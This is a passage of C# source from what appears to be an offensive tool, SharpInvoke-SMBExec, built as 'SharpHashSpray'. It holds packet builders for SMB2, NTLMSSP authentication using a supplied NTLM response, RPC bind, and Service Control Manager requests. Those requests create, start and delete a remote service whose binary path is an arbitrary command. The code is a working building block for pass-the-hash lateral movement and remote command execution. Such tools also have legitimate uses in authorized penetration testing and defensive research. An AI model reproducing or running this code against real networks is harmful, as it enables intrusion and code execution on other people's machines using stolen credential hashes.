384 | packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_StructureSize", new byte[] { 0x04, 0x00 });
385 | packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_Reserved", new byte[] { 0x00, 0x00 });
386 | return packet_SMB2TreeDisconnectRequest;
387 | }
388 | public static OrderedDictionary SMB2SessionLogoffRequest()
389 | {
390 | OrderedDictionary packet_SMB2SessionLogoffRequest = new OrderedDictionary();
391 | packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_StructureSize", new byte[] { 0x04, 0x00 });
392 | packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_Reserved", new byte[] { 0x00, 0x00 });
393 | return packet_SMB2SessionLogoffRequest;
394 | }
395 | public static OrderedDictionary NTLMSSPNegotiate(byte[] packet_negotiate_flags, byte[] packet_version)
396 | {
397 | byte[] packet_NTLMSSP_length;
398 | //There may be issues here, we will see.
399 | if (packet_version != null)
400 | {
401 | packet_NTLMSSP_length = BitConverter.GetBytes(32 + packet_version.Length);
402 | }
403 | else
404 | {
405 | packet_NTLMSSP_length = BitConverter.GetBytes(32);
406 | }
407 | byte[] packet_NTLMSSP_length2 = { packet_NTLMSSP_length[0] };
408 |
409 | int packet_ASN_length_1 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 32;
410 | byte[] packet_ASN_length_1_2 = (BitConverter.GetBytes(packet_ASN_length_1));
411 |
412 | int packet_ASN_length_2 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 22;
413 | byte[] packet_ASN_length_2_2 = (BitConverter.GetBytes(packet_ASN_length_2));
414 |
415 | int packet_ASN_length_3 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 20;
416 | byte[] packet_ASN_length_3_2 = (BitConverter.GetBytes(packet_ASN_length_3));
417 |
418 | int packet_ASN_length_4 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 2;
419 | byte[] packet_ASN_length_4_2 = BitConverter.GetBytes(packet_ASN_length_4);
420 |
421 |
422 | OrderedDictionary packet_NTLMSSPNegotiate = new OrderedDictionary();
423 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialContextTokenID", new byte[] { 0x60 }); // the ASN.1 key names are likely not all correct
424 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialcontextTokenLength", new byte[] { packet_ASN_length_1_2[0] });
425 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechID", new byte[] { 0x06 });
426 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechLength", new byte[] { 0x06 });
427 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_OID", new byte[] { 0x2b, 0x06, 0x01, 0x05, 0x05, 0x02 });
428 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID", new byte[] { 0xa0 });
429 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength", new byte[] { packet_ASN_length_2_2[0] });
430 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID2", new byte[] { 0x30 });
431 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength2", new byte[] { packet_ASN_length_3_2[0] });
432 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID", new byte[] { 0xa0 });
433 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength", new byte[] { 0x0e });
434 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID2", new byte[] { 0x30 });
435 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength2", new byte[] { 0x0c });
436 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID3", new byte[] { 0x06 });
437 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength3", new byte[] { 0x0a });
438 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechType", new byte[] { 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0a });
439 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenID", new byte[] { 0xa2 });
440 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenLength", new byte[] { packet_ASN_length_4_2[0] });
441 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPID", new byte[] { 0x04 });
442 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPLength", new byte[] { packet_NTLMSSP_length2[0] });
443 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
444 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
445 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NegotiateFlags", packet_negotiate_flags);
446 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
447 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
448 |
449 | if (packet_version != null)
450 | {
451 | packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Version", packet_version);
452 | }
453 |
454 | return packet_NTLMSSPNegotiate;
455 |
456 |
457 | }
458 | public static OrderedDictionary NTLMSSPAuth(byte[] packet_NTLM_response)
459 | {
460 |
461 |
462 | byte[] packet_NTLMSSP_length = BitConverter.GetBytes(packet_NTLM_response.Length);
463 | packet_NTLMSSP_length = new byte[] { packet_NTLMSSP_length[1], packet_NTLMSSP_length[0] };
464 | byte[] packet_ASN_length_1 = BitConverter.GetBytes(packet_NTLM_response.Length + 12);
465 | byte[] packet_ASN_length_1_2 = { packet_ASN_length_1[1], packet_ASN_length_1[0] };
466 | byte[] packet_ASN_length_2 = BitConverter.GetBytes(packet_NTLM_response.Length + 8);
467 | byte[] packet_ASN_length_2_2 = { packet_ASN_length_2[1], packet_ASN_length_2[0] };
468 | byte[] packet_ASN_length_3 = BitConverter.GetBytes(packet_NTLM_response.Length + 4);
469 | byte[] packet_ASN_length_3_2 = { packet_ASN_length_3[1], packet_ASN_length_3[0] };
470 |
471 |
472 |
473 | OrderedDictionary packet_NTLMSSPAuth = new OrderedDictionary();
474 | packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID", new byte[] { 0xa1, 0x82 });
475 | packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength", packet_ASN_length_1_2);
476 | packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID2", new byte[] { 0x30, 0x82 });
477 | packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength2", packet_ASN_length_2_2);
478 | packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID3", new byte[] { 0xa2, 0x82 });
479 | packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength3", packet_ASN_length_3_2);
480 | packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPID", new byte[] { 0x04, 0x82 });
481 | packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPLength", packet_NTLMSSP_length);
482 | packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMResponse", packet_NTLM_response);
483 |
484 | return packet_NTLMSSPAuth;
485 |
486 | }
487 | public static OrderedDictionary RPCBind(int packet_call_ID, byte[] packet_max_frag, byte[] packet_num_ctx_items, byte[] packet_context_ID, byte[] packet_UUID, byte[] packet_UUID_version)
488 | {
489 |
490 | byte[] packet_call_ID_bytes = BitConverter.GetBytes(packet_call_ID);
491 |
492 | OrderedDictionary packet_RPCBind = new OrderedDictionary();
493 | packet_RPCBind.Add("RPCBind_Version", new byte[] { 0x05 });
494 | packet_RPCBind.Add("RPCBind_VersionMinor", new byte[] { 0x00 });
495 | packet_RPCBind.Add("RPCBind_PacketType", new byte[] { 0x0b });
496 | packet_RPCBind.Add("RPCBind_PacketFlags", new byte[] { 0x03 });
497 | packet_RPCBind.Add("RPCBind_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
498 | packet_RPCBind.Add("RPCBind_FragLength", new byte[] { 0x48, 0x00 });
499 | packet_RPCBind.Add("RPCBind_AuthLength", new byte[] { 0x00, 0x00 });
500 | packet_RPCBind.Add("RPCBind_CallID", packet_call_ID_bytes);
501 | packet_RPCBind.Add("RPCBind_MaxXmitFrag", new byte[] { 0xb8, 0x10 });
502 | packet_RPCBind.Add("RPCBind_MaxRecvFrag", new byte[] { 0xb8, 0x10 });
503 | packet_RPCBind.Add("RPCBind_AssocGroup", new byte[] { 0x00, 0x00, 0x00, 0x00 });
504 | packet_RPCBind.Add("RPCBind_NumCtxItems", packet_num_ctx_items);
505 | packet_RPCBind.Add("RPCBind_Unknown", new byte[] { 0x00, 0x00, 0x00 });
506 | packet_RPCBind.Add("RPCBind_ContextID", packet_context_ID);
507 | packet_RPCBind.Add("RPCBind_NumTransItems", new byte[] { 0x01 });
508 | packet_RPCBind.Add("RPCBind_Unknown2", new byte[] { 0x00 });
509 | packet_RPCBind.Add("RPCBind_Interface", packet_UUID);
510 | packet_RPCBind.Add("RPCBind_InterfaceVer", packet_UUID_version);
511 | packet_RPCBind.Add("RPCBind_InterfaceVerMinor", new byte[] { 0x00, 0x00 });
512 | packet_RPCBind.Add("RPCBind_TransferSyntax", new byte[] { 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 });
513 | packet_RPCBind.Add("RPCBind_TransferSyntaxVer", new byte[] { 0x02, 0x00, 0x00, 0x00 });
514 |
515 |
516 | if (packet_num_ctx_items[0] == 2)
517 | {
518 | packet_RPCBind.Add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 });
519 | packet_RPCBind.Add("RPCBind_NumTransItems2", new byte[] { 0x01 });
520 | packet_RPCBind.Add("RPCBind_Unknown3", new byte[] { 0x00 });
521 | packet_RPCBind.Add("RPCBind_Interface2", new byte[] { 0xc4, 0xfe, 0xfc, 0x99, 0x60, 0x52, 0x1b, 0x10, 0xbb, 0xcb, 0x00, 0xaa, 0x00, 0x21, 0x34, 0x7a });
522 | packet_RPCBind.Add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 });
523 | packet_RPCBind.Add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 });
524 | packet_RPCBind.Add("RPCBind_TransferSyntax2", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
525 | packet_RPCBind.Add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 });
526 | }
527 | else if (packet_num_ctx_items[0] == 3)
528 | {
529 | packet_RPCBind.Add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 });
530 | packet_RPCBind.Add("RPCBind_NumTransItems2", new byte[] { 0x01 });
531 | packet_RPCBind.Add("RPCBind_Unknown3", new byte[] { 0x00 });
532 | packet_RPCBind.Add("RPCBind_Interface2", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
533 | packet_RPCBind.Add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 });
534 | packet_RPCBind.Add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 });
535 | packet_RPCBind.Add("RPCBind_TransferSyntax2", new byte[] { 0x33, 0x05, 0x71, 0x71, 0xba, 0xbe, 0x37, 0x49, 0x83, 0x19, 0xb5, 0xdb, 0xef, 0x9c, 0xcc, 0x36 });
536 | packet_RPCBind.Add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 });
537 | packet_RPCBind.Add("RPCBind_ContextID3", new byte[] { 0x02, 0x00 });
538 | packet_RPCBind.Add("RPCBind_NumTransItems3", new byte[] { 0x01 });
539 | packet_RPCBind.Add("RPCBind_Unknown4", new byte[] { 0x00 });
540 | packet_RPCBind.Add("RPCBind_Interface3", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
541 | packet_RPCBind.Add("RPCBind_InterfaceVer3", new byte[] { 0x00, 0x00 });
542 | packet_RPCBind.Add("RPCBind_InterfaceVerMinor3", new byte[] { 0x00, 0x00 });
543 | packet_RPCBind.Add("RPCBind_TransferSyntax3", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
544 | packet_RPCBind.Add("RPCBind_TransferSyntaxVer3", new byte[] { 0x01, 0x00, 0x00, 0x00 });
545 | packet_RPCBind.Add("RPCBind_AuthType", new byte[] { 0x0a });
546 | packet_RPCBind.Add("RPCBind_AuthLevel", new byte[] { 0x04 });
547 | packet_RPCBind.Add("RPCBind_AuthPadLength", new byte[] { 0x00 });
548 | packet_RPCBind.Add("RPCBind_AuthReserved", new byte[] { 0x00 });
549 | packet_RPCBind.Add("RPCBind_ContextID4", new byte[] { 0x00, 0x00, 0x00, 0x00 });
550 | packet_RPCBind.Add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
551 | packet_RPCBind.Add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
552 | packet_RPCBind.Add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 });
553 | packet_RPCBind.Add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
554 | packet_RPCBind.Add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
555 | packet_RPCBind.Add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f });
556 | }
557 |
558 | if (packet_call_ID == 3)
559 | {
560 | packet_RPCBind.Add("RPCBind_AuthType", new byte[] { 0x0a });
561 | packet_RPCBind.Add("RPCBind_AuthLevel", new byte[] { 0x02 });
562 | packet_RPCBind.Add("RPCBind_AuthPadLength", new byte[] { 0x00 });
563 | packet_RPCBind.Add("RPCBind_AuthReserved", new byte[] { 0x00 });
564 | packet_RPCBind.Add("RPCBind_ContextID3", new byte[] { 0x00, 0x00, 0x00, 0x00 });
565 | packet_RPCBind.Add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
566 | packet_RPCBind.Add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
567 | packet_RPCBind.Add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 });
568 | packet_RPCBind.Add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
569 | packet_RPCBind.Add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
570 | packet_RPCBind.Add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f });
571 | }
572 |
573 | return packet_RPCBind;
574 | }
575 | public static OrderedDictionary RPCRequest(byte[] packet_flags, int packet_service_length, int packet_auth_length, int packet_auth_padding, byte[] packet_call_ID, byte[] packet_context_ID, byte[] packet_opnum, byte[] packet_data)
576 | {
577 | int packet_full_auth_length;
578 | byte[] packet_write_length;
579 | byte[] packet_alloc_hint;
580 | if (packet_auth_length > 0)
581 | {
582 | packet_full_auth_length = packet_auth_length + packet_auth_padding + 8;
583 | }
584 | else
585 | {
586 | packet_full_auth_length = 0;
587 | }
588 |
589 |
590 | if (packet_data != null)
591 | {
592 | packet_write_length = BitConverter.GetBytes(packet_service_length + 24 + packet_full_auth_length + packet_data.Length);
593 | packet_alloc_hint = BitConverter.GetBytes(packet_service_length + packet_data.Length);
594 | }
595 | else
596 | {
597 | packet_write_length = BitConverter.GetBytes(packet_service_length + 24 + packet_full_auth_length);
598 | packet_alloc_hint = BitConverter.GetBytes(packet_service_length);
599 |
600 | }
601 |
602 | byte[] packet_frag_length = { packet_write_length[0], packet_write_length[1] };
603 | byte[] packet_auth_length2 = BitConverter.GetBytes(packet_auth_length);
604 | byte[] packet_auth_length3 = { packet_auth_length2[0], packet_auth_length2[1] };
605 |
606 | OrderedDictionary packet_RPCRequest = new OrderedDictionary();
607 | packet_RPCRequest.Add("RPCRequest_Version", new byte[] { 0x05 });
608 | packet_RPCRequest.Add("RPCRequest_VersionMinor", new byte[] { 0x00 });
609 | packet_RPCRequest.Add("RPCRequest_PacketType", new byte[] { 0x00 });
610 | packet_RPCRequest.Add("RPCRequest_PacketFlags", packet_flags);
611 | packet_RPCRequest.Add("RPCRequest_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
612 | packet_RPCRequest.Add("RPCRequest_FragLength", packet_frag_length);
613 | packet_RPCRequest.Add("RPCRequest_AuthLength", packet_auth_length3);
614 | packet_RPCRequest.Add("RPCRequest_CallID", packet_call_ID);
615 | packet_RPCRequest.Add("RPCRequest_AllocHint", packet_alloc_hint);
616 | packet_RPCRequest.Add("RPCRequest_ContextID", packet_context_ID);
617 | packet_RPCRequest.Add("RPCRequest_Opnum", packet_opnum);
618 |
619 | if (packet_data != null && packet_data.Length > 0)
620 | {
621 | packet_RPCRequest.Add("RPCRequest_Data", packet_data);
622 | }
623 |
624 | return packet_RPCRequest;
625 |
626 | }
627 |
628 |
629 |
630 | //Look into to see if this can be simplified with what we already have.
631 | public static OrderedDictionary SCMOpenSCManagerW(byte[] packet_service, byte[] packet_service_length)
632 | {
633 | byte[] packet_write_length = BitConverter.GetBytes(packet_service.Length + 92);
634 | byte[] packet_frag_length = { packet_write_length[0], packet_write_length[1] };
635 | byte[] packet_alloc_hint = BitConverter.GetBytes(packet_service.Length + 68);
636 | Random r = new Random();
637 | byte[] packet_referent_init = new byte[2];
638 | r.NextBytes(packet_referent_init);
639 | byte[] packet_referent_ID1 = packet_referent_init.Concat(new byte[] { 0x00, 0x00 }).ToArray();
640 | byte[] packet_referent_init2 = new byte[2];
641 | r.NextBytes(packet_referent_init2);
642 | byte[] packet_referent_ID2 = packet_referent_init2.Concat(new byte[] { 0x00, 0x00 }).ToArray();
643 |
644 |
645 | OrderedDictionary packet_SCMOpenSCManagerW = new OrderedDictionary();
646 | packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ReferentID", packet_referent_ID1);
647 | packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_MaxCount", packet_service_length);
648 | packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
649 | packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ActualCount", packet_service_length);
650 | packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName", packet_service);
651 | packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_ReferentID", packet_referent_ID2);
652 | packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameMaxCount", new byte[] { 0x0f, 0x00, 0x00, 0x00 });
653 | packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
654 | packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameActualCount", new byte[] { 0x0f, 0x00, 0x00, 0x00 });
655 | packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database", new byte[] { 0x53, 0x00, 0x65, 0x00, 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x41, 0x00, 0x63, 0x00, 0x74, 0x00, 0x69, 0x00, 0x76, 0x00, 0x65, 0x00, 0x00, 0x00 });
656 | packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Unknown", new byte[] { 0xbf, 0xbf });
657 | packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_AccessMask", new byte[] { 0x3f, 0x00, 0x00, 0x00 });
658 |
659 | return packet_SCMOpenSCManagerW;
660 | }
661 | public static OrderedDictionary SCMCreateServiceW(byte[] packet_context_handle, byte[] packet_service, byte[] packet_service_length, byte[] packet_command, byte[] packet_command_length)
662 | {
663 | Random r = new Random();
664 | byte[] packet_referent_init = new byte[2];
665 | r.NextBytes(packet_referent_init);
666 | byte[] nulls = { 0x00, 0x00 };
667 | byte[] packet_referent_ID = new byte[4];
668 | Buffer.BlockCopy(packet_referent_init, 0, packet_referent_ID, 0, packet_referent_init.Length);
669 | Buffer.BlockCopy(nulls, 0, packet_referent_ID, packet_referent_init.Length, nulls.Length);
670 | OrderedDictionary packet_SCMCreateServiceW = new OrderedDictionary();
671 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_ContextHandle", packet_context_handle);
672 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_MaxCount", packet_service_length);
673 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
674 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_ActualCount", packet_service_length);
675 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName", packet_service);
676 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ReferentID", packet_referent_ID);
677 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_MaxCount", packet_service_length);
678 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
679 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ActualCount", packet_service_length);
680 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName", packet_service);
681 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_AccessMask", new byte[] { 0xff, 0x01, 0x0f, 0x00 });
682 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceType", new byte[] { 0x10, 0x00, 0x00, 0x00 });
683 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceStartType", new byte[] { 0x03, 0x00, 0x00, 0x00 });
684 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceErrorControl", new byte[] { 0x00, 0x00, 0x00, 0x00 });
685 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_MaxCount", packet_command_length);
686 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
687 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_ActualCount", packet_command_length);
688 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName", packet_command);
689 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer", new byte[] { 0x00, 0x00, 0x00, 0x00 });
690 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_TagID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
691 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
692 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_DependSize", new byte[] { 0x00, 0x00, 0x00, 0x00 });
693 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer3", new byte[] { 0x00, 0x00, 0x00, 0x00 });
694 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer4", new byte[] { 0x00, 0x00, 0x00, 0x00 });
695 | packet_SCMCreateServiceW.Add("SCMCreateServiceW_PasswordSize", new byte[] { 0x00, 0x00, 0x00, 0x00 });
696 |
697 | return packet_SCMCreateServiceW;
698 | }
699 | public static OrderedDictionary SCMStartServiceW(byte[] packet_context_handle)
700 | {
701 | OrderedDictionary packet_SCMStartServiceW = new OrderedDictionary();
702 | packet_SCMStartServiceW.Add("SCMStartServiceW_ContextHandle", packet_context_handle);
703 | packet_SCMStartServiceW.Add("SCMStartServiceW_Unknown", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
704 | return packet_SCMStartServiceW;
705 | }
706 | public static OrderedDictionary SCMDeleteServiceW(byte[] packet_context_handle)
707 | {
708 | OrderedDictionary packet_SCMDeleteServiceW = new OrderedDictionary();
709 | packet_SCMDeleteServiceW.Add("SCMDeleteServiceW_ContextHandle", packet_context_handle);
710 |
711 | return packet_SCMDeleteServiceW;
712 | }
713 | public static OrderedDictionary SCMCloseServiceHandle(byte[] packet_context_handle)
714 | {
715 | OrderedDictionary packet_SCM_CloseServiceW = new OrderedDictionary();
716 | packet_SCM_CloseServiceW.Add("SCMCloseServiceW_ContextHandle", packet_context_handle);
717 |
718 | return packet_SCM_CloseServiceW;
719 | }
720 | #endregion
721 |
722 | }
723 | }
724 |
--------------------------------------------------------------------------------
/SharpInvoke-SMBExec/SharpHashSpray.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {344EE55A-4E32-46F2-A003-69AD52B55945}
8 | Exe
9 | Properties
10 | SharpInvoke_SMBExec
11 | SharpHashSpray
12 | v4.0
13 | 512
14 | true
15 |
16 |
17 |
18 | AnyCPU
19 | true
20 | full
21 | false
22 | bin\Debug\
23 | DEBUG;TRACE
24 | prompt
25 | 4
26 | false
27 |
28 |
29 | AnyCPU
30 | pdbonly
31 | true
32 | bin\Release\
33 | TRACE
34 | prompt
35 | 4
36 | false
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
66 |
--------------------------------------------------------------------------------
/SharpInvoke-SMBExec/Utilities.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections;
3 | using System.Collections.Generic;
4 | using System.Collections.Specialized;
5 | using System.Linq;
6 |
7 | namespace SharpInvoke_SMBExec
8 | {
9 | class Utilities
10 | {
11 | public static ushort DataLength(int length_start, byte[] string_extract_data)
12 | {
13 | byte[] bytes = { string_extract_data[length_start], string_extract_data[length_start + 1] };
14 | ushort string_length = BitConverter.ToUInt16(GetByteRange(string_extract_data, length_start, length_start + 1), 0);
15 | return string_length;
16 | }
17 | public static byte[] GetByteRange(byte[] array, int start, int end)
18 | {
19 | var newArray = array.Skip(start).Take(end - start + 1).ToArray();
20 | return newArray;
21 | }
22 |
23 | public static byte[] ConvertStringToByteArray(string hex)
24 | {
25 | return Enumerable.Range(0, hex.Length)
26 | .Where(x => x % 2 == 0)
27 | .Select(x => Convert.ToByte(hex.Substring(x, 2), 16))
28 | .ToArray();
29 | }
30 |
31 | public static byte[] ConvertFromPacketOrderedDictionary(OrderedDictionary packet_ordered_dictionary)
32 | {
33 | List byte_list = new List();
34 | foreach (DictionaryEntry de in packet_ordered_dictionary)
35 | {
36 | byte_list.Add(de.Value as byte[]);
37 | }
38 |
39 | var flattenedList = byte_list.SelectMany(bytes => bytes);
40 | byte[] byte_Array = flattenedList.ToArray();
41 |
42 | return byte_Array;
43 | }
44 | }
45 | }
46 |
--------------------------------------------------------------------------------